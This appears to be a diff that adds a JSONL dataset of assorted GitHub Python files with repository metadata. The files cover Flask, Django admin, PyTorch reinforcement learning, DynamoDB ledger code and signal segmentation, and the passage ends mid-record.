diff --git "a/1181.jsonl" "b/1181.jsonl" new file mode 100644--- /dev/null +++ "b/1181.jsonl" @@ -0,0 +1,838 @@ +{"seq_id": "22224692881", "text": "import sqlite3, os\nSQLITE_NAME = \"fatpanda.tmp.db\"\n# if os.path.isfile(SQLITE_NAME): os.remove(SQLITE_NAME)\n\n\ndef fpd_raw_connection(db_path=SQLITE_NAME):\n conn = sqlite3.connect(db_path)\n '''Optional processing'''\n return conn\n\nfrom .readers import (\n read_csv,\n concat_csv,\n read_sql_query\n)", "repo_name": "shashfrankenstien/FatPanda", "sub_path": "fatpanda/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 311, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "sqlite3.connect", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "41185222380", "text": "import json\nfrom flask import Flask\n\napp = Flask(__name__)\n\nwith open('../data/keywords_json.json', 'r') as f:\n jsondata = json.load(f)\n\n\n@app.route('/')\ndef index():\n return jsondata\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n", "repo_name": "secantsquared/flaskreactapp", "sub_path": "server/app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "json.load", "line_number": 7, "usage_type": "call"}]} +{"seq_id": "10697609667", "text": "import json\nd = {\n \"vezetekNev\": \"Kovacs\",\n \"keresztNev\": \"Janos\",\n \"kor\": 25,\n \"cim\":\n {\n \"utcaHazszam\": \"2. utca 21.\",\n \"varos\": \"New York\",\n \"allam\": \"NY\",\n \"iranyitoSzam\": \"10021\"\n }\n}\nprint(json.dumps(d))\nwith open(\"dump.txt\", \"w\") as f:\n\tjson.dump(d,f)\n\n", "repo_name": "Gero4884/Gero4884", "sub_path": "json1.py", "file_name": "json1.py", "file_ext": "py", "file_size_in_byte": 316, "program_lang": "python", "lang": "hu", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "json.dumps", "line_number": 14, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "40233180338", "text": "from __future__ import (absolute_import, division, generators, nested_scopes, print_function,\n unicode_literals, with_statement)\n\nimport logging\nimport os\n\n# NB(zundel): these definitions are a part of the source from https://github.com/pantsbuild/pants\nfrom pants.backend.jvm.targets.exportable_jvm_library import ExportableJvmLibrary\nfrom pants.base.exceptions import TargetDefinitionException\nfrom pants.base.payload import Payload\nfrom pants.base.payload_field import PrimitiveField\n\n\nlogger = logging.getLogger(__name__)\n\nclass JaxWsLibrary(ExportableJvmLibrary):\n \"\"\"Generates a Java library from JAX-WS wsdl files.\"\"\"\n\n def __init__(self,\n payload=None,\n vm_args=None,\n xjc_args=None,\n extra_args=None,\n **kwargs):\n \"\"\"Generates a Java library from WSDL files using JAX-WS.\n\n :param list vm_args: Additional arguments for the JVM.\n :param list xjc_args: Additional arguments to xjc.\n :param list extra_args: Additional arguments for the CLI.\n \"\"\"\n payload = payload or Payload()\n payload.add_fields({\n 'vm_args': PrimitiveField(vm_args or ()),\n 'xjc_args': PrimitiveField(xjc_args or ()),\n 'extra_args': PrimitiveField(extra_args or ()),\n })\n super(JaxWsLibrary, self).__init__(payload=payload, **kwargs)\n self.add_labels('codegen')\n", "repo_name": "ericzundel/mvn2pants", "sub_path": "src/python/squarepants/plugins/jax_ws/targets/jax_ws_library.py", "file_name": "jax_ws_library.py", "file_ext": "py", "file_size_in_byte": 1380, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 14, "usage_type": "call"}, {"api_name": "pants.backend.jvm.targets.exportable_jvm_library.ExportableJvmLibrary", "line_number": 16, "usage_type": "name"}, {"api_name": "pants.base.payload.Payload", "line_number": 31, "usage_type": "call"}, {"api_name": "pants.base.payload_field.PrimitiveField", "line_number": 33, "usage_type": "call"}, {"api_name": "pants.base.payload_field.PrimitiveField", "line_number": 34, "usage_type": "call"}, {"api_name": "pants.base.payload_field.PrimitiveField", "line_number": 35, "usage_type": "call"}]} +{"seq_id": "42167978913", "text": "import argparse\n\nfrom game import Runner\n\nTRAPS = [(2, 2), (3, 3), (4, 4), (5, 5)]\nWIND = [0, 0, 0, 1, 1, 1, 2, 2, 1, 0]\nSTART = (3, 0)\nGOAL = (3, 7)\n\nparser = argparse.ArgumentParser(description='My script')\nparser.add_argument('-a', '--actions', help='Number of actions that agent can take (4, 8, 9')\nparser.add_argument('-e', '--episodes', help='Number of training episodes')\nparser.add_argument('-v', '--verbose', help='verbose')\nparser.add_argument('-t', '--traps', help='Number of traps 0,1,2,3,4')\n\nargs = parser.parse_args()\nactions_list = [4, 8, 9]\nif args.actions:\n actions_list = [int(args.actions)]\nepisodes = int(args.episodes or 200)\nverbose = int(args.verbose or 10)\ntraps = min(4, int(args.traps or 0))\nfor actions in actions_list:\n if actions not in [4, 8, 9]:\n raise Exception('Invalid \"-a/--actions\"')\n\nfor actions in actions_list:\n game = Runner(num_actions=actions,\n start=START,\n goal=GOAL,\n verbose=verbose,\n episodes=episodes,\n rows=7,\n cols=10,\n gamma=1,\n wind=WIND,\n traps=TRAPS[:traps],\n render_interval=[51, 50])\n game.train()\n game.test(pause=3)\n", "repo_name": "shadi-danhash/q-learning-simulation", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 1267, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "61", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 10, "usage_type": "call"}, {"api_name": "game.Runner", "line_number": 28, "usage_type": "call"}, {"api_name": "game.train", "line_number": 39, "usage_type": "call"}, {"api_name": "game.test", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "37253410841", "text": "from django.core.management.base import BaseCommand\nfrom optparse import make_option\n\nfrom synnefo import quotas\n\n\nclass Command(BaseCommand):\n help = \"Detect and resolve pending commissions to Quotaholder\"\n output_transaction = True\n option_list = BaseCommand.option_list + (\n make_option(\"--fix\", dest=\"fix\",\n action='store_true',\n default=False,\n help=\"Fix pending commissions\"\n ),\n )\n\n def handle(self, *args, **options):\n fix = options['fix']\n\n accepted, rejected = quotas.resolve_pending_commissions()\n\n if accepted:\n self.stdout.write(\"Pending accepted commissions:\\n %s\\n\"\n % list_to_string(accepted))\n\n if rejected:\n self.stdout.write(\"Pending rejected commissions:\\n %s\\n\"\n % list_to_string(rejected))\n\n if fix and (accepted or rejected):\n self.stdout.write(\"Fixing pending commissions..\\n\")\n quotas.resolve_commissions(accept=accepted, reject=rejected,\n strict=False)\n\n\ndef list_to_string(l):\n return \",\".join([str(x) for x in l])\n", "repo_name": "mpastyl/websocket-console", "sub_path": "synnefo/snf-cyclades-app/synnefo/quotas/management/commands/reconcile-commissions-cyclades.py", "file_name": "reconcile-commissions-cyclades.py", "file_ext": "py", "file_size_in_byte": 1218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.core.management.base.BaseCommand", "line_number": 7, "usage_type": "name"}, {"api_name": "django.core.management.base.BaseCommand.option_list", "line_number": 10, "usage_type": "attribute"}, {"api_name": "django.core.management.base.BaseCommand", "line_number": 10, "usage_type": "name"}, {"api_name": "optparse.make_option", "line_number": 11, "usage_type": "call"}, {"api_name": "synnefo.quotas.resolve_pending_commissions", "line_number": 21, "usage_type": "call"}, {"api_name": "synnefo.quotas", "line_number": 21, "usage_type": "name"}, {"api_name": "synnefo.quotas.resolve_commissions", "line_number": 33, "usage_type": "call"}, {"api_name": "synnefo.quotas", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "32933771056", "text": "from django.contrib import admin\nfrom . import models\nfrom django.utils.safestring import mark_safe\n\n\n# Register your models here.\n\nclass TagAdmin(admin.ModelAdmin):\n list_display = (\n 'titre',\n 'statut',\n 'date_add',\n 'date_update'\n )\n list_filter = (\n 'statut',\n 'date_add',\n 'date_update',\n )\n search_fields = (\n 'titre',\n )\n list_per_pages = 50\n date_hierarchy = 'date_add'\n\n fieldsets = [\n ('Info ', {'fields': ['titre', ]}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n\nclass CategorieAdmin(admin.ModelAdmin):\n list_display = (\n 'titre',\n 'statut',\n 'date_add',\n 'date_update'\n )\n list_filter = (\n 'statut',\n 'date_add',\n 'date_update',\n )\n search_fields = (\n 'titre',\n )\n list_per_pages = 50\n date_hierarchy = 'date_add'\n\n fieldsets = [\n ('Info ', {'fields': ['titre', ]}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n\nclass CommentaireAdmin(admin.ModelAdmin):\n\n def affiche_image(self, obj):\n if obj.cover:\n return mark_safe(''.format(url=obj.cover.url))\n\n list_display = (\n 'article',\n 'nom',\n 'email',\n 'message',\n 'affiche_image',\n 'statut',\n 'date_add',\n 'date_update'\n )\n\n list_filter = (\n 'article',\n 'statut',\n 'date_add',\n 'date_update'\n )\n search_fields = (\n 'message',\n 'date_add'\n )\n readonly_fields = ['affiche_image']\n fieldsets = [\n ('Info ', {'fields': ['article', 'nom', 'email', 'message', ]\n }),\n ('Image', {'fields': [\n 'cover',\n 'affiche_image'\n ]}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n\nclass ArticleAdmin(admin.ModelAdmin):\n list_display = (\n 'auteur',\n 'titre',\n 'affiche_image',\n 'statut',\n 'date_add',\n 'date_update'\n )\n list_filter = (\n 'categorie',\n 'statut',\n 'tags'\n )\n search_fields = (\n 'titre',\n )\n list_per_pages = 50\n date_hierarchy = 'date_add'\n readonly_fields = ['affiche_image']\n\n fieldsets = [\n ('Info ', {'fields': [\n 'auteur',\n 'titre',\n 'categorie',\n 'tags',\n 'contenu',\n 'resume'\n ]\n }),\n ('Image', {'fields': ['cover', 'affiche_image']}),\n ('Statut et Activations', {'fields': ['statut', ]}),\n ]\n\n def affiche_image(self, obj):\n return mark_safe(''.format(url=obj.cover.url))\n\n\n\n\n\ndef _register(model, admin_class):\n admin.site.register(model, admin_class)\n\n\n_register(models.Article, ArticleAdmin)\n_register(models.Commentaire, CommentaireAdmin)\n_register(models.Categorie, CategorieAdmin)\n_register(models.Tag, TagAdmin)\n\n\n", "repo_name": "paulemxx/Orgo", "sub_path": "blog/admin.py", "file_name": "admin.py", "file_ext": "py", "file_size_in_byte": 3041, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "django.contrib.admin.ModelAdmin", "line_number": 8, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 8, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 32, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 32, "usage_type": "name"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 56, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 56, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 60, "usage_type": "call"}, {"api_name": "django.contrib.admin.ModelAdmin", "line_number": 95, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 95, "usage_type": "name"}, {"api_name": "django.utils.safestring.mark_safe", "line_number": 131, "usage_type": "call"}, {"api_name": "django.contrib.admin.site.register", "line_number": 138, "usage_type": "call"}, {"api_name": "django.contrib.admin.site", "line_number": 138, "usage_type": "attribute"}, {"api_name": "django.contrib.admin", "line_number": 138, "usage_type": "name"}]} +{"seq_id": "38191438054", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 25 13:56:35 2018\n\n@author: galaz\n\"\"\"\n\nimport pyedflib\nimport numpy as np\nimport matplotlib as plt\nf = pyedflib.EdfReader(\"3-1-Schlucktest_Leitfaehigkeit_edited_triggerMarker_edited.bdf\")\nn = f.signals_in_file\nsignal_labels = f.getSignalLabels()\nsigbufs = np.zeros((n, f.getNSamples()[0]))\nfor i in np.arange(n):\n sigbufs[i, :] = f.readSignal(i)\n \nBI = sigbufs[0] \nEMG = sigbufs[1] \nannotations = f.readAnnotations() \nsample_frequency= 4000 \n\ndef segment(t_after,t_befor,sample_frequency,annotations,BI,EMG):\n BI_segment_list = []\n EMG_segment_list = []\n for i in range (annotations[0].size):\n BI_segment = []\n EMG_segment = []\n swallow_index= int(sample_frequency*annotations[0][i])\n segment_start =swallow_index-int(sample_frequency*t_befor)\n segment_end = swallow_index+int(sample_frequency*t_after)\n segment_length = segment_end-segment_start\n for j in range (segment_length):\n BI_segment.append(BI[segment_start+j])\n EMG_segment.append(EMG[segment_start+j])\n BI_segment_list.append(BI_segment) \n EMG_segment_list.append(EMG_segment) \n return [BI_segment_list, EMG_segment_list] \n \nresult=segment(2,0.5,4000,annotations,BI,EMG) \n\nfig = plt.pyplot.figure()\nax = fig.add_subplot(111)\nnumberofsegment='123456'\n\nfor i in range(annotations[0].size):\n ax = fig.add_subplot(2,annotations[0].size,i+1)\n ax.plot(result[0][i])\n ax = fig.add_subplot(2,annotations[0].size,(annotations[0].size+i+1))\n ax.plot(result[1][i])\n ax.set_title('The: %s st'%numberofsegment[i])\n\n\n", "repo_name": "Gamil-Farea/Schluckerkennung", "sub_path": "Code/Gamil_test_V1.py", "file_name": "Gamil_test_V1.py", "file_ext": "py", "file_size_in_byte": 1642, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "pyedflib.EdfReader", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "attribute"}]} +{"seq_id": "1640022022", "text": "from functools import lru_cache\n\n\nclass Solution:\n def minimumDistance(self, word: str) -> int:\n word_length = len(word)\n\n def distance(char_a: str, char_b: str) -> int:\n if not char_a or not char_b:\n # return 0 for the first letter\n return 0\n\n index_a = ord(char_a) - ord('A')\n index_b = ord(char_b) - ord('A')\n\n return abs(index_a // 6 - index_b // 6) + abs(index_a % 6 - index_b % 6)\n\n @lru_cache(maxsize=None)\n def find(ind: int, key_a: str, key_b: str) -> int:\n # boundary condition\n if ind == word_length:\n return 0\n\n char = word[ind]\n\n return min(\n find(ind + 1, key_a, char) + distance(key_b, char),\n find(ind + 1, char, key_b) + distance(key_a, char)\n )\n\n return find(0, None, None)\n\n\nif __name__ == '__main__':\n word = \"A\" * 300\n print(Solution().minimumDistance(word))", "repo_name": "amogchandrashekar/Leetcode", "sub_path": "Hard/Minimum Distance to Type a Word Using Two Fingers.py", "file_name": "Minimum Distance to Type a Word Using Two Fingers.py", "file_ext": "py", "file_size_in_byte": 997, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "functools.lru_cache", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "29223279208", "text": "import random\nfrom time import sleep, time\nimport starkbank\nfrom datetime import datetime, timedelta\nfrom src.authentication import user\n\nstarkbank.user = user\n\n\ninvoices = starkbank.invoice.create([\n starkbank.Invoice(\n amount=248,\n descriptions=[{'key': 'Arya', 'value': 'Not today'}],\n discounts=[{'percentage': 10, 'due': datetime.now()+timedelta(days=10)}],\n due=datetime.now()+timedelta(days=10),\n expiration=123456789,\n fine=2.5,\n interest=1.3,\n name=\"Arya Stark\",\n tags=['New sword', 'Invoice #1234'],\n tax_id=\"29.176.331/0001-69\"\n )\n])\n\nbreakpoint()", "repo_name": "RodrigoNavarroNogueira/apisdk", "sub_path": "src/teste.py", "file_name": "teste.py", "file_ext": "py", "file_size_in_byte": 634, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "starkbank.user", "line_number": 7, "usage_type": "attribute"}, {"api_name": "src.authentication.user", "line_number": 7, "usage_type": "name"}, {"api_name": "starkbank.invoice.create", "line_number": 10, "usage_type": "call"}, {"api_name": "starkbank.invoice", "line_number": 10, "usage_type": "attribute"}, {"api_name": "starkbank.Invoice", "line_number": 11, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 14, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 14, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 15, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 15, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "28928388087", "text": "from __future__ import division\nfrom __future__ import print_function\nfrom __future__ import absolute_import\n\nimport os\nimport uuid\nimport random\nimport subprocess\n\nfrom argparse import ArgumentParser\n\n\ndef list_files(path_to_annotations, file_extension):\n \"\"\"Get list of files in a given directory\"\"\"\n file_list = []\n for file in os.listdir(path_to_annotations):\n if file.endswith('.' + file_extension):\n file_list.append(file)\n return file_list\n\n\ndef pick_random_images(background_dir):\n \"\"\"Return paths to randomly chosen fore/background images\"\"\"\n background_list = list_files(background_dir, 'jpg')\n background_image = os.path.join(background_dir, random.choice(background_list))\n\n return background_image\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('--input_dir', '-i', type=str, help='directory of foreground images')\n parser.add_argument('--background_dir', '-b', type=str, help='directory of background images')\n parser.add_argument('--out_dir', '-o', type=str, help='output directory')\n args = parser.parse_args()\n\n sequence_names = []\n for item in os.listdir(args.input_dir):\n if os.path.isdir(item):\n sequence_names.append(item)\n\n for sequence in sequence_names:\n input = os.path.join(args.input_dir, sequence)\n background = pick_random_images(args.background_dir)\n output = os.path.join(args.out_dir, sequence)\n\n cmd = ['python', 'composite_video.py',\n '--input', input,\n '--background', background,\n '--output', output]\n\n subprocess.check_call(cmd)\n", "repo_name": "atomicguy/simulants", "sub_path": "simulants/legacy/batch_comp_videos.py", "file_name": "batch_comp_videos.py", "file_ext": "py", "file_size_in_byte": 1657, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.listdir", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path", "line_number": 25, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 25, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 31, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path", "line_number": 45, "usage_type": "attribute"}, {"api_name": "subprocess.check_call", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "32404734265", "text": "#pylint:disable=E1101\n\nimport random\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.distributions import Categorical\nimport numpy as np\nimport pandas as pd\nimport numpy as numpy\nimport matplotlib.pyplot as plt\nimport argparse\nfrom models import MyModel\nfrom math_dataset import MyDataset\n\n\ndef main():\n _i, _j, _k = 2,3,3\n dataset = MyDataset(_i,_j,_k)\n\n dtype = torch.float\n device = torch.device(\"cpu\")\n # device = torch.device(\"cuda:0\")\n\n #batch, input, hidden, output\n N, D_in, H, D_out = 10, _i+_j+_k, 16, _i*_j*_k\n msg_len = 10\n\n x, y = dataset.get_frame()\n x = torch.tensor(x, dtype=dtype, device=device)\n #x = torch.cat((x,x,x,x,x),0)\n y = torch.tensor(y, dtype=torch.long, device=device).squeeze()\n #y = torch.cat((y,y,y,y,y),0)\n print(x.size(), y.size())\n #x = torch.zeros(N, D_in, device=device, dtype=dtype)\n #y = torch.zeros(N, device=device, dtype=dtype)\n\n model = MyModel(D_in, H, D_out)\n #model = torch.nn.Linear(D_in, D_out)\n\n loss_fn = torch.nn.CrossEntropyLoss(reduce=None)\n optimizer = torch.optim.Adam(model.parameters(), lr=1e-2)\n\n for t in range(10001):\n if True: #reinforce\n y_pred = model(x)\n probs = F.softmax(y_pred, dim=1)\n m = Categorical(probs)\n action = m.sample()\n reward = torch.eq(action, y).to(torch.float)\n reward = (reward - reward.mean())\n loss = -m.log_prob(action) * reward\n model.zero_grad()\n loss.sum().backward()\n #loss.backward(loss)\n optimizer.step()\n \n elif True:\n y_pred = model(x)\n \n else: # supervised\n y_pred = model(x)\n loss = loss_fn(y_pred, y)\n model.zero_grad()\n loss.backward()\n optimizer.step()\n\n if t % 100 == 0:\n with torch.no_grad():\n y_pred = model(x)\n eq = torch.eq(torch.argmax(y_pred, dim=1), y)\n print(\"t: {}, acc: {}/{} = {}\".format(t, torch.sum(eq).item(), eq.numel(), torch.sum(eq).item() / eq.numel()))\n\n\n torch.save({'epoch': t,\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'loss': loss\n }, \"checkpoints.tar\")\n\nif __name__ == \"__main__\":\n main()\n \n\n\n\n # model3 = MyModel(D_in, H, D_out)\n # optimizer = torch.optim.Adam(model.parameters(), lr=1e-4)\n # checkpoint = torch.load(\"checkpoints.tar\")\n # model.load_state_dict(checkpoint['model_state_dict'])\n # optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n # epoch = checkpoint['epoch']\n # loss = checkpoint['loss']\n\n # print(model.state_dict())\n # print(optimizer.state_dict())\n\n # PATH = \"model.pt\"\n # torch.save(model.state_dict(), PATH)\n\n # model2 = MyModel(D_in, H, D_out)\n # model.load_state_dict(torch.load(PATH))\n # model.eval() # for dropout and BN", "repo_name": "parkjunsoo91/number-communication", "sub_path": "supervised.py", "file_name": "supervised.py", "file_ext": "py", "file_size_in_byte": 3095, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "math_dataset.MyDataset", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.long", "line_number": 33, "usage_type": "attribute"}, {"api_name": "models.MyModel", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 42, "usage_type": "attribute"}, {"api_name": "torch.optim.Adam", "line_number": 43, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 43, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.softmax", "line_number": 48, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 48, "usage_type": "name"}, {"api_name": "torch.distributions.Categorical", "line_number": 49, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.float", "line_number": 51, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.eq", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.argmax", "line_number": 72, "usage_type": "call"}, {"api_name": "torch.sum", "line_number": 73, "usage_type": "call"}, {"api_name": "torch.save", "line_number": 76, "usage_type": "call"}]} +{"seq_id": "11966980442", "text": "import boto3\nimport time\nfrom datetime import date\nimport decimal\nfrom boto3.dynamodb.conditions import Key, Attr\n\nCONN = None\nTRANSACTIONS_TABLE_NAME = None\nUSERS_TABLE_NAME = None\nTRANSACTIONS_TABLE = None\nUSERS_TABLE = None\n\n\ndef open_connections_and_tables():\n global CONN\n global TRANSACTIONS_TABLE\n global USERS_TABLE\n CONN = boto3.resource('dynamodb')\n TRANSACTIONS_TABLE = CONN.Table(TRANSACTIONS_TABLE_NAME)\n USERS_TABLE = CONN.Table(USERS_TABLE_NAME)\n\n\ndef resolve_names_to_ids(names):\n ids = []\n for name in names:\n field_to_use = 'username' if name[0] == \"@\" else 'name'\n value_to_use = name[1:] if name[0] == \"@\" else name\n items = USERS_TABLE.scan(\n FilterExpression=Attr(field_to_use).eq(value_to_use)\n )[\"Items\"]\n if len(items) != 0:\n ids.append(items.pop()[\"id\"])\n else:\n ids.append(None)\n return dict(zip(names, ids))\n\n\ndef resolve_ids_to_names(ids):\n names = []\n for id in ids:\n items = USERS_TABLE.query(\n KeyConditionExpression=Key('id').eq(id),\n )[\"Items\"]\n if len(items) > 0:\n names.append(\"@{}\".format(items[0][\"username\"]) if \"username\" in items[0] else items[0][\"name\"])\n else:\n names.append(None)\n return names\n\n\ndef debit_transaction(gid, sender, receiver, amt, *, msg_id=None, description=\"\", on_hold=False):\n with decimal.localcontext(boto3.dynamodb.types.DYNAMODB_CONTEXT) as ctx:\n ctx.traps[decimal.Inexact] = False\n ctx.traps[decimal.Rounded] = False\n timestamp = ctx.create_decimal_from_float(time.time())\n item = {\n 'group_id': gid,\n 'id': msg_id,\n 'from': sender,\n 'to': receiver,\n 'amt': -abs(amt),\n 'timestamp': round(timestamp, 2),\n 'on_hold': on_hold\n }\n if description is not None and description.strip() != \"\":\n item[\"description\"] = description.strip()\n TRANSACTIONS_TABLE.put_item(Item=item)\n\n\ndef credit_transaction(gid, sender, receiver, amt, *, msg_id=None, description=\"\", on_hold=False):\n with decimal.localcontext(boto3.dynamodb.types.DYNAMODB_CONTEXT) as ctx:\n ctx.traps[decimal.Inexact] = False\n ctx.traps[decimal.Rounded] = False\n timestamp = ctx.create_decimal_from_float(time.time())\n item = {\n 'group_id': gid,\n 'id': msg_id,\n 'from': sender,\n 'to': receiver,\n 'amt': abs(amt),\n 'timestamp': round(timestamp, 2),\n 'on_hold': on_hold\n }\n if description is not None and description.strip() != \"\":\n item[\"description\"] = description.strip()\n TRANSACTIONS_TABLE.put_item(Item=item)\n\n\ndef view_account(gid, user):\n gid = int(gid)\n user = int(user)\n response = TRANSACTIONS_TABLE.query(\n Select='ALL_ATTRIBUTES',\n KeyConditionExpression=Key('group_id').eq(int(gid)) & Key('timestamp').gt(0),\n FilterExpression=(Attr('from').eq(int(user)) | Attr('to').eq(int(user))) & Attr('on_hold').ne(True)\n )\n entries = response[\"Items\"]\n account = {}\n for entry in entries:\n is_payment = entry[\"amt\"] > 0\n is_receiver = entry[\"to\"] == user\n print(entry, is_payment, is_receiver)\n\n dict_key = entry[\"from\"] if is_receiver else entry[\"to\"]\n if dict_key not in account:\n account[dict_key] = 0\n account[dict_key] = account[dict_key] + (entry[\"amt\"] * (-1 if is_receiver else 1))\n return account\n\n\ndef view_logs(gid, user_id, filter_id, esk=None):\n gid = int(gid)\n uid = int(user_id)\n fid = int(filter_id) if filter_id is not None else None\n if fid is not None:\n filter_expression = (Attr('from').eq(uid) & Attr('to').eq(fid)) | (Attr('from').eq(fid) & Attr('to').eq(uid))\n else:\n filter_expression = Attr('from').eq(uid) | Attr('to').eq(uid)\n entries = []\n while len(entries) < 0:\n response = TRANSACTIONS_TABLE.query(\n Select='ALL_ATTRIBUTES',\n KeyConditionExpression=Key('group_id').eq(int(gid)) & Key('timestamp').gt(0),\n FilterExpression=filter_expression,\n Limit=10,\n ExclusiveStartKey=esk\n )\n entries.extend(response[\"Items\"])\n lek = response.get(\"LastEvaluatedKey\", None)\n # break into timeframes\n\n def destructive_filter(list, callback):\n pass\n # this week\n this_week = [e for e in entries if date.fromtimestamp(e[\"timestamp\"]).isocalendar()[1] == date.today().isocalendar()[1]]\n # last week\n last_week = [e for e in entries if date.fromtimestamp(e[\"timestamp\"]).isocalendar()[1] == date.today().isocalendar()[1] - 1]\n # this month\n # last month\n\n\ndef register_user(uid, *, username=\"\", name=\"\"):\n data = {\n \"id\": int(uid)\n }\n username = username.strip()\n name = name.strip()\n if username != \"\":\n data[\"username\"] = username\n if name != \"\":\n data[\"name\"] = name\n USERS_TABLE.put_item(Item=data)\n\n\ndef find_transaction(gid, mid):\n response = TRANSACTIONS_TABLE.query(\n KeyConditionExpression=Key('group_id').eq(gid),\n FilterExpression=Attr('id').eq(mid)\n )\n try:\n return response[\"Items\"].pop()\n except IndexError:\n return None\n\n\ndef update_transaction(transaction):\n TRANSACTIONS_TABLE.put_item(Item=transaction)\n", "repo_name": "chesnutcase/ledger_bot", "sub_path": "utils/tableutils.py", "file_name": "tableutils.py", "file_ext": "py", "file_size_in_byte": 5439, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "boto3.resource", "line_number": 18, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Attr", "line_number": 29, "usage_type": "call"}, {"api_name": "boto3.dynamodb.conditions.Key", "line_number": 42, "usage_type": "call"}, {"api_name": "decimal.localcontext", "line_number": 52, "usage_type": "call"}, {"api_name": "boto3.dynamodb", "line_number": 52, "usage_type": "attribute"}, {"api_name": "decimal.Inexact", "line_number": 53, "usage_type": "attribute"}, {"api_name": "decimal.Rounded", "line_number": 54, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 55, "usage_type": "call"}, {"api_name": "decimal.localcontext", "line_number": 71, "usage_type": "call"}, {"api_name": "boto3.dynamodb", "line_number": 71, "usage_type": "attribute"}, 